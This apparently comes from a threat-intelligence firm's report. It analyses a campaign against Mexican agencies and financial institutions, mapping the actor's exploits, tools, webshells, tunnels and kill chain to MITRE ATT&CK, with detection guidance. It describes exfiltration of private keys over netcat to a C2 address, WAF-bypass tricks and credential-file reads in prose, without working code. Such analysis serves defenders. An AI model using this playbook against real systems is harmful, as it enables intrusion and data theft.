Operation Escaneo: Infrastructure Exposure, TTP Analysis, and Attribution Assessment of an Advanced Intrusion Campaign Against Mexican Federal Agencies and Financial Institutions

An exposed attacker server revealed the inner workings of Operation Escaneo—a sophisticated campaign targeting Latin American governments and financial institutions. CloudSEK maps its custom tools, exploitation chain, persistence tactics and suspected links to MexicanMafia. Read the full investigation.

June 17, 2026

min

Table of Content

Example H2

Executive Summary

This report documents a coordinated, multi-stage campaign run by a threat actor targeting critical infrastructure across Latin America. Artifacts from the threat actor's staging server reveal a sophisticated operational toolchain spanning all phases of the MITRE ATT&CK framework, from automated reconnaissance through data exfiltration. The campaign is characterised by a proprietary distributed reconnaissance engine (Kimera), a curated exploit armory targeting enterprise perimeter devices (Fortinet, Ivanti, Cisco), portable lateral movement toolkits, and layered command-and-control infrastructure using Neo-reGeorg webshells, Chisel reverse tunnels, and compromised Cisco routers with persistent GRE tunnels.

The threat actor demonstrated capability to operate across Windows and Linux environments, compromise SAP ERP and Oracle database systems for command execution, extract cryptographic material and Active Directory datasets, and maintain long-dwell access through multiple redundant persistence mechanisms. Based on the available information, we have attributed this campaign with medium confidence to MexicanMafia aka PanchoVilla.

Background

Known/Claimed Attacks by Pancho Villa

1. Oaxaca State Police (Secretaría de Seguridad y Protección Ciudadana) — March 2024 Pancho Villa posted on Breach Forums claiming to have exfiltrated 2,935,021 lines of data spanning 2007–2024, totalling over 800MB. The data included names of detained individuals, personal data, and police officer credentials. When the state government denied the breach, Pancho Villa defaced the official Oaxaca government website in the early hours of April 3, 2024, inserting the group's image as proof — where it remained visible until at least 8am that day.

2. "Chilango Leaks" — Mexico City Government (CDMX) — April 2024 Mexican Mafia released 20GB of what they called "Chilango Leaks," which included approximately 2.1 million private emails from over 2,000 CDMX public servant accounts across agencies ranging from the Secretaría de Obras y Servicios to the DIF.

3. UNAM — Instituto de Investigaciones en Matemáticas Aplicadas y en Sistemas (IIMAS) — early 2024 Member "Lord Peña" obtained 2.3 million files from UNAM's IIMAS, including banking data, for which he asked $500.

4. UNAM — Instituto de Investigaciones Filológicas (IIFL) — April 2024 Member "Dyce" hacked UNAM's IIFL and put up for sale a 29GB database claiming to contain network credentials, full names, images, and access keys.

5. SAT (Tax Authority) — Vulnerabilities Disclosed — March/April 2024 Lord Peña disclosed at least three vulnerabilities in the SAT website during the annual personal income tax filing period in 2024.

6. ORFIS Veracruz (Órgano de Fiscalización Superior) — March 2024 Lord Peña listed access to ORFIS internal servers on Breach Forums for $1,500.

7. Estado de México Government — March 2024 Member "Buda" put up for sale a database of subdomains from the State of Mexico government.

8. Quálitas Insurance — June 2024 Pancho Villa claimed to hold 300,000 lines of Quálitas Mexico customer data including names, phone numbers, addresses, and insurance types, offered for sale at $400.

9. PEMEX — July 2024 Mexican Mafia breached servers contracted by PEMEX and obtained over 50 databases with 11,000 records including employee contracts, names, email addresses, and payroll data. The data was initially listed at $1,000, then raised to $2,000 to, as Pancho Villa stated, "push away intelligence researchers."

10. Poder Judicial de la Ciudad de México (PJCDMX) — August 2024 Mexican Mafia compromised the Mexico City Supreme Court, offering 300,000+ user credentials from their appointments and case management system (SICOR/OPC), covering data from 2017 to 2024 including pension claims, legal filings, actuarial assignments, and payment receipts. After a 72-hour ultimatum expired without a sale, they published source code and credentials of 162,439 users, including accounts from UNAM (1,192), IMSS, ISSSTE, SEP, and the FGR. Pancho Villa said the breach took "10 to 15 minutes" due to unpatched legacy systems.

11. Tribunal Superior de Justicia de Oaxaca — October 2024 Mexican Mafia claimed access to over 30 terabytes of data from the Oaxaca Superior Court, including videos of court proceedings that exposed the identities of those involved in legal cases. Pancho Villa framed this as a protest against government neglect of indigenous communities.

Important caveats:

The 2025–2026 AI-assisted breach of Mexican government agencies (Gambit Security report) was not attributed to Mexican Mafia, but based on the overlaps, it can be ascertained with high confidence that the threat actor we analyzed is following the same footsteps.
Some claims (especially database sizes) have been disputed or denied by affected institutions, though in several cases (Oaxaca defacement, PJCDMX source code leak) independent verification was possible.

Analysis

In early 2026, during routine malicious infrastructure discovery, CloudSEK discovered an open directory hosted on 62.171.185[.]97.

Based on the artefacts obtained from the server, we were able to comprehensively map the capabilities of the threat actor.

Attribute	Detail
Activity Period	2025–2026
Primary Sectors	Government, Tax Authority, Utilities, Transportation, Telecommunications, Financial Services
Geographic Focus	Latin America (Mexico primary; Ecuador secondary; Portugal tertiary)
Confirmed Victims	Multiple (RCE beacons from ≥5 distinct victim IPs; 407 MB AD dataset exfiltrated; over 1.3 million PII records extracted)
Confidence Level	High — based on direct artifact analysis from the threat actor’s staging server

1. Threat Actor Categorization

The threat actor exhibits TTPs consistent with a well-resourced, operationally disciplined group with established infrastructure and custom tooling development capability. The following characteristics are assessed with high confidence from artifact analysis.

1.1 Operational Maturity Indicators

Maintains a proprietary distributed reconnaissance framework (Kimera) with parallelised enumeration and automated vulnerability-to-exploitation pipeline
Operates a centralised exploit armory with stable, operationally-tested CVE implementations — including custom variants of public PoCs modified to prevent target crashes
Conducts on-premise credential cracking on operational infrastructure to avoid exfiltrating encrypted hashes over the internet (OPSEC-aware)
Implements per-target proxychains configurations with creation timestamps and operator comments, indicating structured operational documentation
Demonstrated capability to compromise network-layer infrastructure (Cisco routers, FortiGate VPNs) in addition to host-level systems
Active campaign duration of at least 13 days confirmed by Chisel session logs (3,708 sessions processed)

1.2 Geographic and Sectoral Focus

Primary targeting of LATAM government ministries, tax authorities, and utility providers
Spanish-language regex patterns in credential harvesting scripts confirm regional operational focus
Secondary targeting of telecommunications and aviation infrastructure for network-level access
Tertiary activity against European financial institution (confirmed via Chisel reverse tunnel pivot)

1.3 Motivations Assessment

Data theft and PII aggregation at scale (>1.3M records extracted from single transportation provider)
Credential and cryptographic material theft enabling impersonation and traffic decryption
Active Directory mapping for sustained long-term persistence beyond credential rotation
Financial exploitation via compromised procurement workflows and e-commerce platform API key theft
Strategic espionage potential through compromise of tax authority SSL private keys and MDM infrastructure

2. MITRE ATT&CK Mapping

The following table maps all observed techniques to the MITRE ATT&CK Enterprise framework v15. Each row reflects direct artifact evidence from the threat actor's staging server.

Tactic	Technique ID	Technique Name	Observed Procedure / Artifact
Reconnaissance	T1595.001	Active Scanning: Scanning IP Blocks	High-velocity subdomain enumeration via subfinder, assetfinder, findomain and gobuster with 50 threads; dnsx with 200 threads; naabu port scanning at 5,000 pps against government and aviation targets.
Reconnaissance	T1595.002	Active Scanning: Vulnerability Scanning	Nuclei fed all discovered URLs, scanning all CVE severity levels; dalfox automated XSS hunting; GeoServer WFS endpoint probing.
Reconnaissance	T1592	Gather Victim Host Information	httpx with randomized user agents and redirect following to fingerprint live hosts; whatweb technology-stack fingerprinting.
Reconnaissance	T1589.001	Gather Victim Identity Information: Credentials	Regex-based `deep_scan.py` extracting AWS keys, JWTs, bearer tokens, Base64 secrets, LDAP strings and SAP credentials from source repositories.
Reconnaissance	T1593.002	Search Open Websites/Domains: Search Engines	JavaScript endpoint extraction via LinkFinder to uncover hidden APIs and administrative panels.
Reconnaissance	T1590.001	Gather Victim Network Information: Domain Properties	Subdomain brute-forcing with the SecLists top-1M dictionary; DNS resolution mapping across government and corporate domains.
Resource Development	T1587.001	Develop Capabilities: Malware	Custom Kimera V1/V2 distributed reconnaissance framework; Xortigate exploit variants; custom SMB protocol handlers (`mysmb.py`); ZipSlip webshell dropper (`mkzip34.py`).
Resource Development	T1588.006	Obtain Capabilities: Vulnerabilities	Pre-staged CVE-specific exploit chains: Fortinet CVE-2022-42475, CVE-2023-27997 and CVE-2024-21762; Ivanti CVE-2023-46805, CVE-2024-21887 and CVE-2025-0282; Zerologon CVE-2020-1472; EternalBlue MS17-010; SMBGhost CVE-2020-0796.
Resource Development	T1583.003	Acquire Infrastructure: Virtual Private Server	DigitalOcean VPS at 62.171.185.97 used as the primary C2, callback listener, Chisel relay and payload-staging server.
Resource Development	T1608.001	Stage Capabilities: Upload Malware	Centralized exploit armory on the staging server; chunked payload delivery from `chunk_aa` through `chunk_aj` for evasion; `pip_chunk` staged Python modules.
Initial Access	T1190	Exploit Public-Facing Application	Fortinet FortiOS SSL-VPN exploitation (CVE-2022-42475 and CVE-2025-0282); Ivanti Connect Secure exploitation (CVE-2023-46805 and CVE-2024-21887); GhostCat Apache Tomcat AJP exploitation (CVE-2020-1938); GeoServer WFS injection; Oracle DBMS_SCHEDULER RCE; SAP RFC abuse.
Initial Access	T1133	External Remote Services	Credential-based VPN access using cleartext credentials extracted from FortiGate configuration dumps; RDP access via harvested credentials.
Initial Access	T1566.002	Phishing: Spearphishing Link	Custom phishing pages targeting tax-authority employees and corporate document-management users; credential-harvesting infrastructure.
Initial Access	T1190	Exploit Public-Facing Application (SMB)	EternalBlue MS17-010 via Metasploit resource scripts; SMBGhost CVE-2020-0796 custom Python tooling.
Execution	T1059.004	Command and Scripting Interpreter: Unix Shell	DBMS_SCHEDULER shell commands redirected to `/tmp`; SAP RFC SXPG_CALL_SYSTEM executing OS commands; Bash webshells; `bind_shell.py`; `perl_shell.pl`; `rev.sh`.
Execution	T1059.007	Command and Scripting Interpreter: JavaScript	GeoServer `Runtime.getRuntime()` execution via WFS request injection; JSP webshells including `status.jsp`, `ver.jsp` and `sedema_proc.jsp`.
Execution	T1059.008	Command and Scripting Interpreter: Network Device CLI	Cisco IOS TCL script injection confirming router compromise; programmatic GRE-tunnel configuration via an IOS-XE SSH session.
Execution	T1072	Software Deployment Tools	SAP RFC function modules SXPG_CALL_SYSTEM and SXPG_COMMAND_INSERT used for authenticated OS-command execution across the SAP ERP environment.
Execution	T1203	Exploitation for Client Execution	ysoserial CommonsCollections5 Java deserialization payload (`payload_wget2.b64`) targeting vulnerable Java application servers.
Execution	T1569.002	System Services: Service Execution	Oracle DBMS_SCHEDULER job-based command execution with a UTL_FILE output-retrieval feedback loop.
Persistence	T1505.003	Server Software Component: Web Shell	Neo-reGeorg JSPX/JSP webshells with AES-encrypted channels and custom Base64 encoding; PHP webshells (`shell.php`, `ws.php`, `bt.php`); JSP shells; CFM shell; WSDL-based execution interface; ZipSlip dropper embedding `xpw3.jsp` in malicious archives.
Persistence	T1572	Protocol Tunneling	Neo-reGeorg SOCKS5 tunnels via HTTP; Chisel reverse-proxy tunnelling TCP over HTTP using an AMD64 ELF binary; GRE tunnel configured on a compromised Cisco router pointing to the attacker VPS.
Persistence	T1133	External Remote Services	AnyDesk configurations (`anydesk_svc.conf` and `anydesk_usr.conf`); RDP configuration files; N-able RMM agent impersonation via crafted LNK files.
Persistence	T1546	Event Triggered Execution	Malicious ZIP archives created with the `mkzip34.py` ZipSlip technique, deploying webshells when extracted on victim infrastructure.
Privilege Escalation	T1068	Exploitation for Privilege Escalation	PwnKit CVE-2021-4034 source, compiled binary, Base64 encoding and chunked delivery; FortiOS heap grooming and memory spray leading to privileged RCE as the VPN process.
Privilege Escalation	T1210	Exploitation of Remote Services	Zerologon CVE-2020-1472 using repeated Netlogon zero-credential authentication to confirm domain-controller compromise and elevate to Domain Admin.
Privilege Escalation	T1078.002	Valid Accounts: Domain Accounts	GPP XML artifacts revealing DSSAT domain-admin accounts, including Admin_APS4, SCCMSystemgroup and CMClientPushSrv; use of RCIVIL\maturano credentials for PsExec lateral movement.
Privilege Escalation	T1548	Abuse Elevation Control Mechanism	Oracle SQL scripts enumerating sudo privileges, writable paths such as `/etc`, `/usr` and `/var`, and cron-job abuse opportunities after execution.
Defense Evasion	T1562.003	Impair Defenses: Impair Command History Logging	`opsec_enum.sh` post-exploitation cleanup; `StrictHostKeyChecking no` and `UserKnownHostsFile /dev/null` in SSH configurations to suppress forensic artifacts.
Defense Evasion	T1036.005	Masquerading: Match Legitimate Name or Location	LNK files mimicking the N-able RMM agent, including `ApplianceConfig.lnk`, `CredentialsConfig.lnk` and `ServerConfig.lnk`.
Defense Evasion	T1027	Obfuscated Files or Information	Base64-encoded payloads including `chisel.b64`, `pwnkit_b64`, `neo.jspx.b64` and `payload.b64`; chunked ELF binary delivery; AES-encrypted Neo-reGeorg webshell channel; custom Base64 alphabet.
Defense Evasion	T1090.002	Proxy: External Proxy	Multi-port SOCKS5 relay on 165.22.184.26 using ports 1080, 5554 and 5571; proxychains configurations for campaign targets; strict-chain DNS-leak prevention.
Defense Evasion	T1550.002	Use Alternate Authentication Material: Pass the Hash	Impacket `psexec.py`, `wmiexec.py` and `ntlmrelayx.py` in a portable `mini_imp/` bundle for credential-free lateral movement.
Defense Evasion	T1205	Traffic Signaling	WAF-bypass scripts using X-Forwarded-For localhost spoofing (127.0.0.1), Googlebot user-agent impersonation, double URL encoding, null-byte injection and concat operators.
Defense Evasion	T1140	Deobfuscate/Decode Files or Information	WebLogic AES/3DES/ECB password-decryption scripts; FortiGate AES-CBC configuration decryption using a hardcoded key; Oracle encrypted-credential decryption.
Credential Access	T1003.001	OS Credential Dumping: LSASS Memory	Impacket `secretsdump.py` in a portable execution bundle; `smb_capture.log` showing NTLM-hash interception.
Credential Access	T1558.003	Steal or Forge Kerberos Tickets: Kerberoasting	`GetUserSPNs.py` from Impacket; `kerberoast_tickets.hash` containing Kerberoastable service-account hashes.
Credential Access	T1552.001	Unsecured Credentials: Credentials in Files	FortiGate configuration extraction containing cleartext VPN credentials; `pgpass.conf`; `mssql_pass.txt`; `cisco_creds.log`.
Credential Access	T1552.005	Unsecured Credentials: Cloud Instance Metadata API	`deep_scan.py` regex extraction of AWS access keys, Azure secrets and JWT tokens from source-code repositories.
Credential Access	T1555.003	Credentials from Password Stores: Credentials from Web Browsers	Chrome credential-store collection, including Local State, Login Data and Login Data For Account SQLite databases.
Credential Access	T1110.002	Brute Force: Password Spraying	`aggressive_spray.py`, `fast_brute.sh` and `pfsense_brute.py`; victim-aware MySQL hash cracking using Spanish-language patterns and organization-specific terms.
Credential Access	T1212	Exploitation for Credential Access	SAP RFC TH_GREP and RFC_REMOTE_FILE used to read `/etc/passwd` and `/etc/shadow` without OS root; PostgreSQL `sys_eval` used to exfiltrate SSL private keys.
Discovery	T1082	System Information Discovery	SAP RSPARAM, CHECK_OS and DIR_LIST command execution; Oracle `netstat -rn` output retrieved through UTL_FILE; `recon2.sql` OS-level fingerprinting.
Discovery	T1016	System Network Configuration Discovery	FortiGate configuration dumps containing full network topology, routing tables and internal subnet layouts; Cisco router BGP-neighbour extraction.
Discovery	T1018	Remote System Discovery	`ms17scan.rc` scanning the 10.39.x.x subnet; dnsx DNS resolution using 200 threads; naabu port scanning at 5,000 pps.
Discovery	T1069.002	Permission Groups Discovery: Domain Groups	Impacket Active Directory user enumeration identifying SQL service users, Citrix administrators and CyberArk vault operators from AD logs; GPP XML privilege mapping.
Discovery	T1087.002	Account Discovery: Domain Account	PasswordLastSet and LastLogon attribute correlation to reconstruct the IT hierarchy; SAP BAPI_USER_GET_DETAIL role and profile enumeration.
Discovery	T1135	Network Share Discovery	Neo-reGeorg SMB port-445 probing across the 10.8.7.0/24 subnet, targeting seven hosts simultaneously.
Discovery	T1526	Cloud Service Discovery	VMware AirWatch MDM deployment assessment targeting CVE-2022-22972 authentication bypass.
Discovery	T1046	Network Service Discovery	naabu port scanning; Oracle `rce3.sql` validating lateral-movement pathways to Kerberos, SMB, LDAP, SSH and RDP services.
Lateral Movement	T1021.002	Remote Services: SMB/Windows Admin Shares	PsExec through Metasploit using domain credentials; Impacket `psexec.py` and `smbexec.py` in a portable bundle.
Lateral Movement	T1021.001	Remote Services: Remote Desktop Protocol	`default.rdp`, `users_rdp.txt` and `pass_rdp.txt` used for credential-based RDP movement.
Lateral Movement	T1210	Exploitation of Remote Services	EternalBlue MS17-010 Metasploit resource scripts targeting 10.39.x.x hosts; SMBGhost CVE-2020-0796 custom payloads; SambaCry targeting Linux and Unix hosts; MS08-067 NetAPI targeting legacy Windows systems.
Lateral Movement	T1090.001	Proxy: Internal Proxy	SOCKS5 pivot through 165.22.184.26:5571 to internal 10.39.x.x systems; Chisel reverse tunnel creating SOCKS proxies on 127.0.0.1:1080–1081; internal relay node at 10.39.1.204.
Lateral Movement	T1080	Taint Shared Content	Router-to-router pivot using `rt01_telnet_rt02.py`; TFTP configuration staging for network-device lateral movement.
Collection	T1213	Data from Information Repositories	SeedDMS phishing targeting corporate document repositories; Zabbix global-macro extraction yielding cleartext administrative credentials across monitored infrastructure.
Collection	T1005	Data from Local System	Oracle UTL_FILE reading output files from `/tmp`; SAP RFC_REMOTE_FILE reading `/etc/passwd` and `/etc/shadow`; PostgreSQL `lo_import` ingesting server certificates.
Collection	T1119	Automated Collection	`dump_batch.sh` iterating through Oracle tables in 100,000-row increments; SAP XML bulk-credential extraction; Kimera automated pipeline from discovery to exploitation triage.
Collection	T1114	Email Collection	Zimbra password extraction through `zimbra_passwords.txt`; credential harvesting targeting email infrastructure.
Collection	T1185	Browser Session Hijacking	`cors_exploit_poc.html` using `req.withCredentials=true` CORS abuse to hijack authenticated sessions; SAT AMAUTHID session-token extraction.
Command and Control	T1071.001	Application Layer Protocol: Web Protocols	Neo-reGeorg HTTP POST BLV-encoded C2 channel; reverse shells on ports 80, 443 and 8080 to blend with HTTP and HTTPS traffic; Wget-based callback beacons.
Command and Control	T1572	Protocol Tunneling	Chisel TCP-over-HTTP tunnels with 3,708 sessions during the campaign; GRE tunnel on a compromised Cisco router to the attacker VPS; SSH-over-SOCKS5 chained tunnelling.
Command and Control	T1090.003	Proxy: Multi-hop Proxy	Layered architecture using a public VPS, SOCKS5 relay at 165.22.184.26, internal pivot and target subnet; per-target `proxychains.conf` routing.
Command and Control	T1132.002	Data Encoding: Non-Standard Encoding	Binary Length Value encoding for the Neo-reGeorg command-and-response channel; custom Base64 alphabet in the webshell.
Command and Control	T1001.001	Data Obfuscation: Junk Data	AES-encrypted Neo-reGeorg channel key; GZIP-compressed inner payload loaded through reflection with an obfuscated `defineClass` invocation.
Command and Control	T1059.008	Network Device CLI (C2 via Router)	TCL script injection on the Cisco router RT01-IBM-PRINCIPAL-IDE; GRE tunnel providing persistent network-level C2 while bypassing host-based detection.
Exfiltration	T1048.003	Exfiltration Over Alternative Protocol	PostgreSQL `sys_eval` and Netcat pipeline streaming SSL private keys to 62.171.185.97:8888; Wget POST requests sending system metadata and credentials to the C2.
Exfiltration	T1030	Data Transfer Size Limits	ELF binary divided into approximately 3.9 KB fragments from `chunk_aa` through `chunk_aj` to evade signature-based detection and transfer thresholds.
Exfiltration	T1567	Exfiltration Over Web Service	SOCKS5-tunnelled exfiltration through 45.61.137.126:7227; Log4Shell JNDI callback exfiltration from 135.237.122.202 to 62.171.185.97:1389.
Exfiltration	T1041	Exfiltration Over C2 Channel	Oracle CSV spooling to `/tmp` followed by exfiltration; TFTP pull-based retrieval of network-device configurations; compressed 407 MB BloodHound Active Directory dataset exfiltration.
Impact	T1485	Data Destruction	MySQL skip-grant-tables injection directly into database configuration, bypassing authentication and enabling unrestricted data manipulation.
Impact	T1491	Defacement / Web Content Manipulation	ZipSlip archive dropper created with `mkzip34.py`, embedding a JSP webshell in a path-traversal structure to re-establish access after archive restoration.
Impact	T1565.001	Data Manipulation: Stored Data Manipulation	SAP SXPG_COMMAND_INSERT used to inject custom OS commands, including ZREDTEAM → whoami; manipulation of procurement workflows through stolen session credentials.

3. Vulnerability Exploitation Arsenal

The threat actor maintains a curated and operationally-tested exploit collection spanning perimeter devices, Windows SMB services, Linux privilege escalation, and Java application servers. Exploits are customised from public PoCs for operational stability.

CloudSEK Vulnerability Exploitation Table

CVE / Vuln	Product	Description	CVSS	Operational Use	Kill Chain Stage
CVE-2022-42475	Fortinet FortiOS	SSL-VPN Heap-Based Buffer Overflow	Critical (9.8)	RCE on perimeter VPN devices; custom variant (haggis-42475/) for operational stability	Initial Access
CVE-2023-27997	Fortinet FortiOS	SSL-VPN Heap Overflow (XORtigate)	Critical (9.8)	Multiple xortigate variants (v2–v4) with reverse shell payload to C2	Initial Access
CVE-2024-21762	Fortinet FortiOS	Out-of-Bounds Write	Critical (9.6)	exploit_21762.py; reverse shell logs confirming exploitation (forti_revshell.log)	Initial Access
CVE-2023-46805	Ivanti Connect Secure	Authentication Bypass	Critical (9.1)	Chained with CVE-2024-21887 for unauthenticated RCE	Initial Access
CVE-2024-21887	Ivanti Connect Secure	Command Injection	Critical (9.1)	Chained exploit; compiled binary present	Initial Access
CVE-2025-0282	Ivanti Connect Secure	Stack Overflow	Critical (9.0)	Compiled exploit binary staged	Initial Access
CVE-2020-1938	Apache Tomcat	AJP Protocol LFI/RCE (GhostCat)	Critical (9.8)	ajpShooter.py targeting exposed AJP connectors	Initial Access / Execution
MS17-010	Windows SMB	EternalBlue SMBv1 RCE	Critical	Multiple .rc scripts; confirmed exploitation attempt logs on Windows Storage Server 2008	Lateral Movement
CVE-2020-0796	Windows SMBv3	SMBGhost Memory Corruption	Critical (10.0)	smbghost_scan.py + smbghost_payload.py; smbghost_shell.log	Lateral Movement
CVE-2020-1472	Windows Netlogon	Zerologon Domain Escalation	Critical (10.0)	zerologon_tester.py confirming DC vulnerability before domain takeover	Privilege Escalation
CVE-2021-4034	Linux polkit	PwnKit pkexec Privilege Escalation	High (7.8)	Source + binary + base64 + chunked delivery; validates root via id and /etc/shadow read	Privilege Escalation
CVE-2020-1206	Windows SMBv3	SMBleed Info Disclosure + ASLR Bypass	High (7.5)	Chained with SMBGhost for stable RCE	Lateral Movement
MS08-067	Windows Server Svc	NetAPI Buffer Overflow	Critical (10.0)	Metasploit .rc scripts targeting legacy Windows nodes	Lateral Movement
Log4Shell	Apache Log4j	JNDI Injection RCE	Critical (10.0)	LDAP callback listener; confirmed victim JNDI callback (135.237.122.202)	Execution / Initial Access
CVE-2022-22972	VMware AirWatch	Authentication Bypass	Critical (9.8)	MDM deployment assessment for mobile device admin access	Initial Access

4. Tools, Frameworks and Utilities

The following tools were identified across artifacts. The threat actor deploys both open-source tools and custom-developed frameworks, often packaging open-source tools in portable execution environments to bypass EDR detection on restricted networks.

CloudSEK Tools Table

Tool / Framework	Type	Usage in Campaign	ATT&CK Techniques
Kimera V1/V2	Custom	Distributed recon: subdomain enum, port scanning, XSS, screenshot, JS extraction	T1595.001, T1595.002
Nuclei	Open Source	Template-based CVE and misconfiguration scanning	T1595.002
Dalfox	Open Source	Automated XSS fuzzing and validation	T1595.002
Subfinder / Assetfinder / Findomain	Open Source	Passive and active subdomain enumeration	T1595.001
naabu	Open Source	High-speed port scanning (5,000 pps)	T1046
dnsx	Open Source	DNS resolution at 200 threads	T1590.001
httpx	Open Source	HTTP probing with UA randomization	T1592
gowitness	Open Source	Headless browser screenshots for recon dossier	T1592
LinkFinder	Open Source	JavaScript endpoint and secret extraction	T1593.002
whatweb	Open Source	Technology stack fingerprinting	T1592
Impacket (mini_imp/)	Open Source (portable)	Lateral movement: psexec, wmiexec, smbexec, secretsdump, GetUserSPNs	T1021.002, T1003.001, T1558.003
Neo-reGeorg	Open Source	HTTP-tunneled SOCKS5 webshell framework (JSPX/JSP/ASPX/PHP/Go/ASHX)	T1505.003, T1572, T1090.001
Chisel	Open Source	TCP-over-HTTP reverse proxy tunnel (Go ELF AMD64)	T1572
Metasploit	Open Source	EternalBlue, SambaCry, MS08-067, PsExec, JMX exploitation	T1210, T1021.002
ysoserial	Open Source	Java deserialization payload generator (CommonsCollections5)	T1203
Hashcat / John	Open Source	On-server credential cracking (SAP, NTLM, MySQL hashes)	T1110
proxychains	Open Source	Traffic routing through SOCKS5 relay chain	T1090.002, T1090.003
Bloodhound / SharpHound	Open Source	Active Directory trust and privilege mapping (407MB dump)	T1069.002, T1087.002
AnyDesk (abused)	Commercial (abused)	Persistent remote access via legitimate RMM software	T1133
N-able (abused)	Commercial (abused)	RMM agent impersonation via crafted LNK files	T1036.005

5. Campaign Kill Chain Narrative

Phase 0 — Reconnaissance (T1595, T1592, T1590)

The campaign opens with the Kimera distributed footprinting engine executing parallelised subdomain enumeration across targets using four concurrent tools with file descriptor limits removed. dnsx resolves at 200 threads, naabu port-scans at 5,000 packets/second, and httpx fingerprints live hosts with randomised user agents. LinkFinder extracts JavaScript endpoints for hidden API and admin panel discovery. Kimera V2 seamlessly transitions from discovery to automated nuclei scanning and dalfox XSS validation without manual intervention.

Phase 1 — Initial Access (T1190, T1133, T1566)

Primary entry is achieved via exploitation of internet-facing VPN and application servers. FortiGate SSL-VPN devices are targeted via CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762 chains, with multiple xortigate variants tuned for operational stability. Ivanti Connect Secure is targeted via the CVE-2023-46805/CVE-2024-21887 authentication bypass and command injection chain. Apache Tomcat AJP connectors are exploited via GhostCat (CVE-2020-1938). Where direct exploitation is not viable, cleartext credentials extracted from FortiGate configuration dumps enable legitimate VPN authentication. Spear-phishing infrastructure is maintained in parallel for credential harvesting.

Phase 2 — Execution (T1059, T1072, T1569)

Code execution is achieved through multiple application-layer substrates: Oracle DBMS_SCHEDULER jobs execute OS commands with UTL_FILE feedback loops; SAP RFC SXPG_CALL_SYSTEM provides authenticated command execution after credential validation via STFC_CONNECTION; GeoServer WFS request parsing triggers Java Runtime.getRuntime() execution confirmed via out-of-band callbacks; ysoserial CommonsCollections5 payloads target unpatched Java application servers. Multiple webshell variants (PHP, JSP, CFM, WSDL) provide redundant execution paths.

Phase 3 — Persistence (T1505, T1572, T1133)

Neo-reGeorg webshells with AES-encrypted channels and custom base64 encoding provide primary persistent web access. Chisel reverse tunnels (3,708 sessions over campaign period) maintain network-layer connectivity. GRE tunnels are programmatically configured on compromised Cisco routers pointing to the attacker VPS, providing network-device-level persistence invisible to host-based detection. AnyDesk and N-able RMM are abused for additional remote access. ZipSlip archives ensure webshell re-deployment upon data restoration.

Phase 4 — Privilege Escalation (T1068, T1210, T1078)

PwnKit CVE-2021-4034 is deployed in chunked format for root access on Linux hosts, immediately validated by reading /etc/shadow. Zerologon CVE-2020-1472 is tested against domain controllers to confirm full domain compromise capability. GPP XML artifacts map privileged domain accounts as escalation targets. SAP function modules extract /etc/shadow without requiring OS root, bypassing traditional privilege boundaries. Heap grooming and memory spraying achieve privileged execution on FortiOS.

Phase 5 — Lateral Movement (T1021, T1210, T1090)

Movement proceeds through multiple parallel paths: EternalBlue MS17-010 via SOCKS5 proxy to internal 10.39.x.x subnets with process migration hardening; MS08-067 for legacy Windows nodes; SambaCry for Linux/Unix hosts; PsExec with harvested domain credentials; Impacket portable bundle for wmiexec and ntlmrelayx. A compromised internal host (10.39.1.204) functions as a relay node for multi-hop movement. Neo-reGeorg SMB probing covers 10.8.7.0/24 for Active Directory and file share enumeration.

Phase 6 — Collection and Exfiltration (T1005, T1119, T1048)

Collection targets credentials, PII, cryptographic material, and Active Directory datasets. Oracle tables are batch-extracted in 100,000-row increments via SQL*Plus spooling. PostgreSQL sys_eval pipelines SSL private keys directly to Netcat listeners. A 407MB BloodHound Active Directory dataset is compressed and exfiltrated. ELF binaries are chunked into ~3.9KB fragments for threshold evasion. SOCKS5-tunneled routing through intermediate nodes provides attribution mitigation during egress.

6. Detection Guidance

The following detection recommendations are derived from specific observed TTPs. Priority should be given to detections covering C2 infrastructure (Neo-reGeorg, Chisel), SAP/Oracle execution abuse, and network device persistence, which represent the highest-impact and most operationally distinctive behaviours.

CloudSEK Detection Guidance Table

Detection Focus	Detection Guidance	ATT&CK Ref
Kimera Reconnaissance	Detect dnsx/naabu/subfinder at high concurrency; monitor for 200+ DNS threads or 5,000 pps port scans from single source; alert on concurrent multi-tool subdomain enumeration	T1595.001, T1046
Neo-reGeorg Webshell	Detect JSPX/JSP files with custom base64 alphabets; monitor for HTTP POST to .jsp/.jspx with BLV-encoded binary payloads; alert on defineClass reflection in web logs	T1505.003
Chisel Tunnel	Detect TLS fingerprint zvoG6rgGEsFlRDUzCipBinOwuUGYWF9qjiem7stcrEk= in network traffic; alert on TCP-over-HTTP connections to unusual external IPs on port 80/443; monitor binary with SHA-256 0a76c28f...	T1572
EternalBlue / SMBGhost	Alert on SMB exploit signatures; monitor for MS17-010 and CVE-2020-0796 scanner patterns; detect process migration (post/windows/manage/migrate) following SMB sessions	T1210
SAP RFC Abuse	Alert on SXPG_CALL_SYSTEM and SXPG_COMMAND_INSERT RFC calls from non-SAP-admin accounts; monitor SXPGCOSTAB read operations; detect custom OS commands inserted into SAP command table	T1072
Oracle DBMS_SCHEDULER RCE	Alert on DBMS_SCHEDULER jobs executing OS commands; monitor UTL_FILE reads from /tmp following scheduler activity; detect ld-linux-x86-64.so.2 execution paths	T1569.002
WAF Bypass Attempts	Detect X-Forwarded-For: 127.0.0.1 combined with Googlebot User-Agent; alert on double URL encoding and null byte injection patterns in web requests	T1205
FortiGate Credential Decryption	Monitor for scripts reading FortiGate ENC entries and using AES-CBC with 16-byte keys; detect fg_decrypt pattern access to config files	T1140
GRE Tunnel on Network Devices	Monitor Cisco IOS-XE for unexpected tunnel interface creation; alert on SSH sessions followed by interface tunnel configuration commands; detect GRE to external IPs	T1572, T1059.008
PwnKit Execution	Detect execution of pkexec with crafted environment variables; monitor for UID change to 0 following pkexec; alert on /etc/shadow access immediately after privilege escalation	T1068
Zerologon Exploitation	Monitor Netlogon authentication attempts with zero-filled credentials against domain controllers; alert on MS-NRPC authentication anomalies	T1210
Kerberoasting	Detect RC4-HMAC Kerberos TGS requests for service accounts; alert on GetUserSPNs.py execution patterns; monitor for large volumes of TGS-REQ	T1558.003
Java Deserialization	Inspect traffic for Java serialization magic bytes AC ED 00 05; alert on CommonsCollections class references in deserialized objects; monitor YSOSERIAL tool signatures	T1203
Log4Shell Activity	Detect JNDI callback strings matching MGLNDD_<IP>_<PORT> pattern; alert on LDAP connections from Java application servers to external IPs	T1190
ZipSlip Archive	Scan ZIP/WAR archives for entries with ../ path traversal; alert on JSP files extracted outside intended web root during archive restoration	T1546

7. Diamond Model

‍8. Impact

Data theft at scale

